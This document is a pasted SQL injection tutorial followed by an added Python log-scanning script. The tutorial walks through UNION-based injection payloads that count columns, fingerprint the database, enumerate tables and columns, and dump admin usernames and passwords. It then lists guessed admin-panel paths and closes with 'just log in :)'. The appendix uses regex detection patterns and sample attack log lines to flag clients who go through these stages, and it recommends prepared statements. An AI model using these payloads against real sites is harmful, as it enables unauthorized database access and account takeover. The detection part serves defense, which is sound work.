- Basic SQL Injection Tutorial by "Linux & Hacking Tutorials"
- 1) Counting columns: Increase the number until you get an ERROR
- .php?id=1 order by 1-- ->no error
- .php?id=1 order by 2-- ->no error
- .php?id=1 order by 3-- ->no error
- .php?id=1 order by 4-- ->no error
- .php?id=1 order by 5-- ->ERROR!
- We got an error on 5, so the column count is 4!
- 2) Finding vulnerable column: add - before ID number, replace order by with union all select and start counting 4 columns: 1,2,3,4
- .php?id=-1 union all select 1,2,3,4--
- Page sends vulnerable column: 2
- 3) Gathering info about database: replace 2 in the syntax with group_concat() and add custom text inside the brackets
- .php?id=-1 union all select 1,group_concat(database(),0x3a,user(),0x3a,version()),3,4--
- Then we got database name, user and version.
- 4) Gathering tables from database: put table_name inside the brackets and add "from information_schema.tables where table_schema=database()--" to the rest of the URL before --
- .php?id=-1 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--
- Page sends tables: news,articles,photos,admins
- 5) Gathering columns from admin's table: In this case the admin login should be in admins table
- replace every "table" with "column" and add "from information_schema.columns where table_name=0xHEX--" to the rest of the URL
- The HEX is the hex value of the table name admins, which is 61646d696e73
- HEX converter: http://www.swingnote.com/tools/texttohex.php
- .php?id=-1 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e73--
- Page sends: id,user,password
- 6) Gathering admins' logins: put user,password in the brackets and add "from (table name here)--" to the rest of the URL
- .php?id=-1 union all select 1,group_concat(user,0x3a,password),3,4 from admins--
- Page sends: admin1:123456
- So, that means the user is admin1 and the password is 123456
- 7) Finding admin panel: You can use tools like this: http://www.scan.subhashdasyam.com/admin-panel-finder.php or do it manually with
- /admin
- /admin.php
- /login
- /login.php
- /cms
- /adm
- ...
- When you find the panel, just log in :)
- That's all
- Video Tutorial: http://youtu.be/YMoJrJE0qfA
- Facebook group on hacking tutorials: https://www.facebook.com/groups/706155462750576/
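
Seen from the server side, the steps above leave a recognisable trail in the web access log. The following Python example is added here and is not part of the original paste; the log lines, IP addresses and the /news.php path are constructed, and the stage names are labels chosen for this example. It flags clients whose requests progress through several of the tutorial's stages.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Stage name -> pattern, one per step of the tutorial above (names are this example's own).
STAGES = {
    "column_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_probe": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "fingerprint": re.compile(r"\b(?:database|user|version)\s*\(\s*\)", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
}
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access log (common log format); not from the original page.
SAMPLE_LOG = """\
198.51.100.20 - - [01/Jan/2024:09:59:00 +0000] "GET /news.php?id=7 HTTP/1.1" 200 900
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=1%20order%20by%204-- HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=1+ORDER+BY+5-- HTTP/1.1" 500 120
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /news.php?id=-1%20union%20all%20select%201,2,3,4-- HTTP/1.1" 200 530
203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /news.php?id=-1+union+all+select+1,group_concat(table_name),3,4+from+information_schema.tables-- HTTP/1.1" 200 610
198.51.100.20 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 700
"""


def stages_in(request_target):
    """Return the set of stages whose pattern appears in the decoded query string."""
    query = request_target.partition("?")[2]
    decoded = unquote_plus(unquote_plus(query))  # decode twice to catch double encoding
    return {name for name, rx in STAGES.items() if rx.search(decoded)}


def scan(log_text):
    """Map client IP -> list of stages seen, in first-seen order."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target = m.groups()
        for stage in sorted(stages_in(target), key=list(STAGES).index):
            if stage not in seen[ip]:
                seen[ip].append(stage)
    return dict(seen)


def suspects(log_text, min_stages=2):
    """Clients that progressed through at least min_stages distinct stages."""
    return sorted(ip for ip, s in scan(log_text).items() if len(s) >= min_stages)
```

Log matching like this is a backstop. The flaw itself is closed by binding id as a parameter in a prepared statement (or casting it to an integer) instead of concatenating it into the query.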